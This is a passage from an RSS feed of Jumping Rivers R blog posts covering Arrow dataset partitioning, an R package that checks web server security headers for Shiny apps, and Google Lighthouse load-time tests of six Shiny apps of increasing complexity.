&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;write_dataset&lt;/span&gt;(palmerpenguins&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;penguins,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; path &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; tmp_dir,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; partitioning &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;species&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; format &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;csv&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This looks like&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;list.files&lt;/span&gt;(tmp_dir, recursive &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;TRUE&lt;/span&gt;, pattern &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;\\.csv$&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [1] &amp;#34;species=Adelie/part-0.csv&amp;#34; &amp;#34;species=Chinstrap/part-0.csv&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## [3] &amp;#34;species=Gentoo/part-0.csv&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;You can also partition using the &lt;code&gt;group()&lt;/code&gt; function from {dplyr}&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;palmerpenguins&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;penguins &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; dplyr&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;group_by&lt;/span&gt;(species) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;write_dataset&lt;/span&gt;(path &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; tmp_dir, format &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;csv&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;In my opinion, while it makes conceptual sense to partition CSV files,
in practice it’s probably not worthwhile. Any CSV files that you
partition to get speed benefits, you might as well use parquet.&lt;/p&gt;
&lt;h3 id="single-files-vs-dataset-apis"&gt;Single files vs dataset APIs&lt;/h3&gt;
&lt;p&gt;When reading in data using Arrow, we can either use the &lt;strong&gt;single&lt;/strong&gt; file
function (these start with &lt;code&gt;read_&lt;/code&gt;) or use the dataset API (these start
with &lt;code&gt;open_&lt;/code&gt;).&lt;/p&gt;
&lt;p&gt;For example, using &lt;code&gt;read_csv_arrow()&lt;/code&gt; reads the CSV file directly into
memory. If the file is particularly large, then we’ll run out of memory.
One thing to note, is the &lt;code&gt;as_data_frame&lt;/code&gt; argument. By default this is
set to &lt;code&gt;TRUE&lt;/code&gt;, meaning that &lt;code&gt;read_csv_arrow()&lt;/code&gt; will return a &lt;code&gt;tibble&lt;/code&gt;.
The upside of this is that we have a familiar object. The downside is
that it takes up more room than Arrow’s internal data representation (an
&lt;a href="https://arrow.apache.org/docs/r/articles/data_objects.html?q=table#tables" rel="external"&gt;Arrow
Table&lt;/a&gt;)&lt;/p&gt;
&lt;p&gt;This blog post by &lt;a href="https://francoismichonneau.net/2022/10/import-big-csv/" rel="external"&gt;François
Michonneau&lt;/a&gt; goes
into far more detail, and discusses the R and Python implementations of
the different APIs.&lt;/p&gt;
&lt;h3 id="acknowledgements"&gt;Acknowledgements&lt;/h3&gt;
&lt;p&gt;This blog was motivated by the excellent &lt;a href="https://posit-conf-2023.github.io/arrow/" rel="external"&gt;Arrow
tutorial&lt;/a&gt; at Posit Conf 2023,
run by Steph Hazlitt and Nic Crane. The NYC dataset came from that
tutorial, and a number of the ideas that I explored were discussed with
the tutorial leaders. I also used a number of resources found on various
corners of the web. I’ve tried to provide links, but if I’ve missed any,
let me know.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/arrow-reading-writing-feather-hive-parquet/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Security Headers for Shiny Applications</title><link>https://www.jumpingrivers.com/blog/shiny-security-server-headers/</link><pubDate>Thu, 11 Jan 2024 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/shiny-security-server-headers/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/shiny-security-server-headers/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/shiny-security-server-headers/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;!-- Just have "Server header in a box on excel draw" --&gt;
&lt;p&gt;Over the last few years, we have been performing audits on Posit
set-ups, Shiny Applications and general R set-ups. One of our standard
checks is to examine the server headers of a Shiny Server. Numerous
websites do this check for you, but as we have an R-based/Quarto
workflow, it was helpful to write a quick &lt;a href="https://github.com/jumpingrivers/serverheaders" rel="external"&gt;R
package&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;The package isn’t on CRAN, but is on the R-universe, so installing is
straightforward&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;install.packages&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;serverHeaders&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; repos &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;https://jumpingrivers.r-universe.dev&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;https://cloud.r-project.org&amp;#34;&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;There are only a couple of exported functions. The core function is
&lt;code&gt;check()&lt;/code&gt;. As an example, let’s use
&lt;a href="https://jumpingrivers.com/" rel="external"&gt;jumpingrivers.com&lt;/a&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# check returns an invisible data frame of results&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;serverHeaders&lt;span style="color:#ff7b72;font-weight:bold"&gt;::&lt;/span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;check&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;jumpingrivers.com&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## ── Checking Server ──&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## ✔ Status code: 301 → 301 → 200&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## ✔ SSL available&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## ✔ SSL redirection successful: http -&amp;gt; https&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## ✔ content-security-policy: Policy present but not parsed&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## ✔ content-type: charset set&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## ✔ permissions-policy: Value present but not verified&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## ✔ referrer-policy: Acceptable setting found&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## ✔ strict-transport-security: max_age = 365 days and is greater than 1 year&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## ✔ x-content-type-options: Acceptable setting found&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## ✔ x-frame-options: Acceptable setting found&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The output to the console highlights key server headers that we are
interested in. Of course, the definition of &lt;em&gt;key&lt;/em&gt; is open to a lot of
discussion, but we just used
&lt;a href="https://securityheaders.com/" rel="external"&gt;securityheaders.com&lt;/a&gt; for guidance.&lt;/p&gt;
&lt;h3 id="comments-on-jumpingriverscom"&gt;Comments on jumpingrivers.com&lt;/h3&gt;
&lt;p&gt;Before we go further, it’s worth noting that a few years ago we decided
to move from Wordpress to a static site generator - Hugo. We made this
decision based on&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;static sites are faster;&lt;/li&gt;
&lt;li&gt;static sites are easier to maintain;&lt;/li&gt;
&lt;li&gt;our previous site (WordPress) had to be constantly updated; dealing
with numerous WordPress plugins always worried us - too much much
for what is essentially a simple site.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;One of the significant consequences of having a static site is the
attack surface is significantly reduced.&lt;/p&gt;
&lt;h4 id="status-codes"&gt;Status codes&lt;/h4&gt;
&lt;p&gt;The first header is the status code. You’re probably familiar with a
status code of 200 indicating a successful request, and the dreaded 404
indicating a missing page. However, when we look at
&lt;a href="https://www.jumpingrivers.com" rel="external"&gt;jumpingrivers.com&lt;/a&gt;, we actually got
three status codes: &lt;code&gt;301&lt;/code&gt;, &lt;code&gt;301&lt;/code&gt;, and then the magical &lt;code&gt;200&lt;/code&gt;. This is
fairly standard. What happens is that jumpingrivers.com is actually the
same as &lt;code&gt;http://jumpingrivers.com&lt;/code&gt;. This redirects (code &lt;code&gt;301&lt;/code&gt;) to
&lt;code&gt;https://jumpingrivers.com&lt;/code&gt; which redirects to
&lt;code&gt;https://www.jumpingrivers.com&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;A “bad” site, wouldn’t redirect to the “https” version.&lt;/p&gt;
&lt;h4 id="content-security-policy"&gt;Content security policy&lt;/h4&gt;
&lt;p&gt;We’ve covered &lt;a href="https://www.jumpingrivers.com/blog/content-security-policy-shiny-posit-connect/" rel="external"&gt;Content Security
Policies&lt;/a&gt;
(or CSP) in previous blog posts. By being explicit about where external
resources are loaded from, e.g. Javascript, it gives applications an
extra layer of security.&lt;/p&gt;
&lt;p&gt;For example, we can state that Javascript can only be loaded from
jumpingrivers.com and example.com. Any JavaScript resource that is
loaded from another site is automatically blocked by the browser. This
safeguards against attacks such as cross-site scripting.&lt;/p&gt;
&lt;p&gt;As jumpingrivers.com is a static site (we use Hugo), we don’t need to
worry about cross-site scripting quite as much; it’s probably overkill.
However, adding CSP to our site has highlighted exactly where we load
external resources from and has encouraged us to keep resources local
where possible.&lt;/p&gt;
&lt;h4 id="permissions-policy"&gt;Permissions policy&lt;/h4&gt;
&lt;p&gt;Permissions policy is similar to CSPs. Essentially, we specify the
resources we would load on our website. For example, would we expect to
use a camera or microphone? Again, for our static site this is overkill,
but for a Shiny application it’s certainly something you should
consider.&lt;/p&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Want to ensure that your application or dashboard follows the latest standards? You might benefit from our &lt;a href="https://www.jumpingrivers.com/data-science/visualisation-and-dashboards/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2024-shiny-security-server-headers"&gt;Shiny health check&lt;/a&gt;.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h4 id="referrer-policy"&gt;Referrer policy&lt;/h4&gt;
&lt;p&gt;When someone clicks a link on a site that takes them to another domain,
the destination site receives information about where that user came
from. This is how we get website analytics about our site traffic.&lt;/p&gt;
&lt;p&gt;This isn’t too important for a site like jumpingrivers.com as we don’t
have anything private on our site - everything is open to the world!
However, if your URL contains potentially private information that you
don’t want to be leaked, e.g. example.com/private-info then you should
set the Referrer Policy.&lt;/p&gt;
&lt;p&gt;For jumpingrivers.com, we set it to &lt;code&gt;no-referrer-when-downgrade&lt;/code&gt;. This
means when going from https to http, we won’t send the referrer header.
Other than that, we’ll send the full path.&lt;/p&gt;
&lt;h4 id="strict-transport-security"&gt;Strict transport security&lt;/h4&gt;
&lt;p&gt;This header informs browsers that a site should only be accessed using
HTTPS. Once set, any future visits will automatically convert http to
https. Remember, from the status code, that typing jumpingrivers.com
into a browser, the URL automatically resolves to
&lt;a href="http://jumpingrivers.com" rel="external"&gt;http://jumpingrivers.com&lt;/a&gt;, so this (after the first visit) tightens up
this issue.&lt;/p&gt;
&lt;h4 id="x-content-type-options"&gt;X content type options&lt;/h4&gt;
&lt;p&gt;This stops a browser from trying to MIME-sniff the content type. This
should be set to &lt;code&gt;x-content-type-options: nosniff&lt;/code&gt;.&lt;/p&gt;
&lt;h4 id="x-frame-options"&gt;X frame options&lt;/h4&gt;
&lt;p&gt;This tells the browser whether or not you want to allow your site to be
framed. At jumpingrivers.com this is set to &lt;code&gt;DENY&lt;/code&gt;.&lt;/p&gt;
&lt;h3 id="shiny-servers"&gt;Shiny servers&lt;/h3&gt;
&lt;p&gt;The {serverHeaders} package checks common security related headers.
There are certainly others, but the headers described above are
certainly the important one. Many Shiny applications we work with
contain sensitive data, help make business critical decisions and/or are
fundamental to a business process. As such, spending some time securing
your server is to be recommended (a little bit of understatement here).&lt;/p&gt;
&lt;h3 id="acknowlegements"&gt;Acknowlegements&lt;/h3&gt;
&lt;p&gt;This &lt;a href="https://github.com/jumpingrivers/serverheaders" rel="external"&gt;package&lt;/a&gt; is based
on a package originally created by Bob Rudis -
&lt;a href="https://github.com/hrbrmstr/hdrs" rel="external"&gt;hdrs&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/shiny-security-server-headers/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Effect of Shiny Widgets with Google Lighthouse</title><link>https://www.jumpingrivers.com/blog/shiny-app-start-up-google-lighthouse-part-3/</link><pubDate>Thu, 14 Dec 2023 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/shiny-app-start-up-google-lighthouse-part-3/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/shiny-app-start-up-google-lighthouse-part-3/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/shiny-app-start-up-google-lighthouse-part-3/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Part 1: &lt;a href="https://www.jumpingrivers.com/blog/shiny-app-start-up-google-lighthouse-part-1/" rel="external"&gt;Using Google Lighthouse for Web Pages&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Part 2: &lt;a href="https://www.jumpingrivers.com/blog/shiny-app-start-up-google-lighthouse-part-2/" rel="external"&gt;Analysing Shiny App start-up Times with Google Lighthouse&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;Part 3: Effect of Shiny Widgets with Google Lighthouse (This post)&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;This is the third blog in our series on the &lt;a href="https://developer.chrome.com/docs/lighthouse/overview/" rel="external"&gt;Google Lighthouse&lt;/a&gt; tool. In &lt;a href="https://www.jumpingrivers.com/blog/shiny-app-start-up-google-lighthouse-part-1/" rel="external"&gt;Part 1&lt;/a&gt;, we looked at what Lighthouse is and how it can be used to assess the start-up times of webpages, and in &lt;a href="https://www.jumpingrivers.com/blog/shiny-app-start-up-google-lighthouse-part-2/" rel="external"&gt;Part 2&lt;/a&gt;, we used Lighthouse to test Shiny apps and performed some analysis on the &lt;a href="https://posit.co/blog/time-to-shiny/" rel="external"&gt;2021 Shiny App Contest&lt;/a&gt; submissions. In this final part I am going to create a few Shiny Apps with different content and use Lighthouse to see the differences. I have creatively named my apps app1, app2, &amp;hellip;, app6.&lt;/p&gt;
&lt;h3 id="the-apps"&gt;The Apps&lt;/h3&gt;
&lt;p&gt;The default app (app1) I&amp;rsquo;m using as baseline is &lt;code&gt;shiny::runExample(&amp;quot;01_helLo&amp;quot;)&lt;/code&gt;, it is just a simple app with a slider input and a histogram, where the slider input dictates the number of histogram bins. It looks like this:&lt;/p&gt;
&lt;img src="img/app1.png" alt="Image of the first app. This app contains a histogram and a slider to the left allowing you to select the number of bins in the histogram." style="width: 80%; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;To actually see what factors cause changes in load time, I&amp;rsquo;m going to be building upon this app incrementally. So, app2 is identical to the first, apart from we have a &lt;a href="https://plotly.com/r/histograms/" rel="external"&gt;{plotly} histogram&lt;/a&gt; instead of a base &lt;code&gt;hist()&lt;/code&gt; plot.&lt;/p&gt;
&lt;p&gt;For app3 I am adding a simple data table using &lt;a href="https://shiny.posit.co/r/reference/shiny/1.7.3/rendertable" rel="external"&gt;&lt;code&gt;shiny::renderTable()&lt;/code&gt;&lt;/a&gt; on top of the second app. App 3 looks like this:&lt;/p&gt;
&lt;img src="img/app3.png" alt="Image of the third app. This app contains a histogram and a slider to the left allowing you to select the number of bins in the histogram. It also now has a table below with columns titled 'eruptions' and 'waiting'" style="width: 80%; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;Then app4 is the same as the third only we are replacing the data table with a &lt;a href="https://rstudio.github.io/DT/shiny.html" rel="external"&gt;{DT} data table&lt;/a&gt; using &lt;code&gt;DT::renderDT()&lt;/code&gt; and &lt;code&gt;DT::DTOutput()&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;For app5 I have added a date input widget in the sidebar. In the 6th and final app, I have changed the {plotly} histogram to a reactive object (so it&amp;rsquo;s not computed twice) and rendered it twice, the original place and in the sidebar to see if that has any impact on the scores. The final app looks like this:&lt;/p&gt;
&lt;img src="img/app6.png" alt="Image of the last app. This app contains a histogram and a slider to the left allowing you to select the number of bins in the histogram. It also now has a table below with columns titled 'eruptions' and 'waiting' which is a dt table, and there is an option to input the date below the bin slider, and another copy of the histogram beneath that." style="width: 80%; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;So now I have a series of 6 apps of increasing complexity. I can now test to see what impact each component I have added does to the Lighthouse reports. I will test each app 10 times to give more accuracy in the results and so we can see variance in the Lighthouse reports. The main things I&amp;rsquo;m looking at from the report the following Lighthouse metrics (covered in &lt;a href="https://www.jumpingrivers.com/blog/shiny-app-start-up-google-lighthouse-part-1/" rel="external"&gt;part 1&lt;/a&gt; of the series):&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;FCP (First Contentful Paint - ms)&lt;/li&gt;
&lt;li&gt;SI (Speed Index - ms)&lt;/li&gt;
&lt;li&gt;LCP (Largest Contentful Paint - ms)&lt;/li&gt;
&lt;li&gt;TTI (Time to Interactive - ms)&lt;/li&gt;
&lt;li&gt;TBT (Total Blocking Time - ms)&lt;/li&gt;
&lt;li&gt;CLS (Cumulative Layout Shift)&lt;/li&gt;
&lt;li&gt;Score&lt;/li&gt;
&lt;/ul&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you require help building a Shiny app? Would you like someone to take over the maintenance burden?
If so, check out
our
&lt;a href="https://www.jumpingrivers.com/consultancy/shiny-dash-flask-dashboard-consultancy/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2023-lighthouse-3"&gt;Shiny and Dash&lt;/a&gt;
services.
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="histogram-showing-all-metrics-measured-in-the-lighthouse-report"&gt;Histogram showing all metrics measured in the Lighthouse report&lt;/h3&gt;
&lt;p&gt;To get a feel for the data obtained, here is a histogram for each of the metrics reported by Lighthouse across the different apps:&lt;/p&gt;
&lt;img src="img/histogram.png" alt="Histogram showing all metrics measured in the Lighthouse report" style="width: 80%; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;With this we can see the spread of score in each metric. This plot gave me a good idea of how to further explore the data.&lt;/p&gt;
&lt;h3 id="time-to-interactive-vs-speed-index"&gt;Time to Interactive vs Speed Index&lt;/h3&gt;
&lt;img src="img/timetointeractive-speedindex.png" alt="Scatter plot showing increases in Lighthouse scores as the apps become more complex" style="width: 80%; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;In this scatter plot of TTI (Time to Interactive - ms) vs SI (Speed Index - ms), we can see the times increasing with each iteration of the app. There is a two-fold difference in TTI between the simplest and the most-complex apps. We can see groupings in the data like {app1}, {app2, app3} and {app4, app5, app6}. This suggests that the first {plotly} graph and the {DT} data table are the most influential components.&lt;/p&gt;
&lt;h3 id="boxplot-of-app-vs-speed-index"&gt;Boxplot of App vs Speed Index&lt;/h3&gt;
&lt;img src="img/boxplot.png" alt="Boxplot of app vs speed index" style="width: 80%; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;This box plot of App vs speed index shows that as the we iterate on the app it&amp;rsquo;s not just the loading times that increase but the variability in loading times as well.&lt;/p&gt;
&lt;h3 id="score-vs-first-contentful-paint"&gt;Score vs First Contentful Paint&lt;/h3&gt;
&lt;img src="img/score-fcp.png" alt="Scatter plot showing the relationship between score and first contentful paint." style="width: 80%; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;Here the more complex apps have slight decreases in overall Lighthouse score as the time for first contentful paint increases.
Those complex apps also show a wide variability in the overall score. Some runs for an app gained a &amp;ldquo;Good&amp;rdquo; user experience
rating (90+) and others a &amp;ldquo;Poor&amp;rdquo; experience (50-89). The first contentful paint scores were relatively constant for a given app,
so I investigated why the difference on 10 score points arose for those apps.&lt;/p&gt;
&lt;h3 id="different-lighthouse-scores-from-the-same-app"&gt;Different Lighthouse Scores From the Same App&lt;/h3&gt;
&lt;p&gt;I mentioned in the last blog that you can getting different Lighthouse scores across runs and suggested doing a few reports to get the best results (I included some information on why this might be in &lt;a href="https://www.jumpingrivers.com/blog/shiny-app-start-up-google-lighthouse-part-2/" rel="external"&gt;part 2&lt;/a&gt;). I now have some evidence of it happening and I want to see why we have the exact same app going from high 80&amp;rsquo;s to high 90&amp;rsquo;s Lighthouse score. Of the 60 app tests I did 9 of them had sub 90 scores, all of them coming in apps 4 and 5.&lt;/p&gt;
&lt;h4 id="radar-plot"&gt;Radar plot&lt;/h4&gt;
&lt;img src="img/radar.png" alt="Radar plot showing the difference in mean scores between the sub 90 apps and their counterparts." style="width: 80%; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;This radar plot compares the mean scores for the apps with Lighthouse scores over 90 vs the ones without. 0% represents the lowest score I recorded for a metric and 100% represents the highest. We can see the sub 90 apps have performed noticeably worse (higher times in each metric, bar score where higher is better), particularly cumulative layout shift. This metric measures movements in the layout of a page, a good example is clicking a button before a page has fully loaded and then the page moves and you have clicked the wrong thing, a better explanation is &lt;a href="https://web.dev/articles/cls" rel="external"&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;h4 id="score-vs-fetch-time"&gt;Score vs Fetch Time&lt;/h4&gt;
&lt;p&gt;&lt;img alt="" height="auto" id="h-rh-i-0" src="https://www.jumpingrivers.com/blog/shiny-app-start-up-google-lighthouse-part-3/img/score-fetchtime.png" width="750"&gt;&lt;/p&gt;
&lt;img src="img/score-fetchtime.png" alt="Scatter Plot showing the time reports took to make and the time they were ran. We can also see the score recieved and which app." style="width: 80%; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;It seemed odd that there was such a big difference between different runs of the same apps, and also that the &lt;em&gt;most&lt;/em&gt; complex app
(app6) wasn&amp;rsquo;t affected in the same way. What else could explain why app4 and app5 had these poor runs?&lt;/p&gt;
&lt;p&gt;Perhaps the best explanation for this is a drop in my network speed during the runs&amp;hellip;&lt;/p&gt;
&lt;p&gt;If we look at the overall scores for the Lighthouse runs against the time when the run was started, there is a clump of sub 90
scores between 15:21 and 15:25. This plot looks very similar to the score vs speed index earlier. I do not have data about my
network speed at the time of running the apps, but it looks like there was a dip in network speed at this time. This is backed up
by the fact the sixth app has no sub 90 score despite being the most complex.&lt;/p&gt;
&lt;p&gt;So even when your app works well, factors beyond your control may affect your Lighthouse results.&lt;/p&gt;
&lt;h3 id="final-words"&gt;Final Words&lt;/h3&gt;
&lt;p&gt;At our &lt;a href="https://shiny-in-production-2023.jumpingrivers.com/" rel="external"&gt;Shiny in Production&lt;/a&gt; conference in October our final keynote speaker,
the data visualisation expert &lt;a href="https://www.cararthompson.com/" rel="external"&gt;Cara Thompson&lt;/a&gt;, was asked about her thoughts on interactive visualisations
in Shiny apps and in the ensuing discussion &lt;a href="https://www.linkedin.com/in/andriedevries/" rel="external"&gt;Andre de Vries&lt;/a&gt; from &lt;a href="https://posit.co/" rel="external"&gt;Posit&lt;/a&gt;
mentioned that {plotly} plots add about a second of loading time each to an app.&lt;/p&gt;
&lt;p&gt;Overall the results are pretty straight forward; adding more widgets to your Shiny app is going to slow it down. We can clearly see that adding interactive elements such as {plotly} plots and {DT} tables to your apps will slow them down. I&amp;rsquo;m not going to recommend not using them, because they don&amp;rsquo;t add that much time if you use them sensibly. One of the main points of Shiny is interactivity after all - you may as well have a markdown report otherwise.&lt;/p&gt;
&lt;p&gt;That being said, don&amp;rsquo;t have a hundred plotlys in your app, because it will be slow. By all means, put a {plotly} in because it &amp;ldquo;looks cool&amp;rdquo; but just remember you are sacrificing a little bit of performance. At the same time maybe think twice about putting a widget when something static would be better for the user.&lt;/p&gt;
&lt;p&gt;Retrospectively I wish I had made a few more apps with more interactive content and tried some interactive maps,
as I imagine that maps would have a big impact on load times. Why not just add more apps to this analysis and
generate more reports? The 60 Lighthouse reports that were covered here were run consecutively on the same day.
Including additional Lighthouse reports after those initial reports may introduce extra complications to the
analysis, due to internet speed variability, updates to Lighthouse etc.&lt;/p&gt;
&lt;p&gt;All being said, Lighthouse is just one tool for assessing the user-experience of your app, and it won&amp;rsquo;t tell you if your app is &amp;ldquo;good&amp;rdquo; or not. Having a fast and efficient app is important for usability, but how enjoyable and easy it is to use are more important for users. This type of feedback is only going to be obtained via user testing and asking users what they are gaining from your app.&lt;/p&gt;
&lt;p&gt;
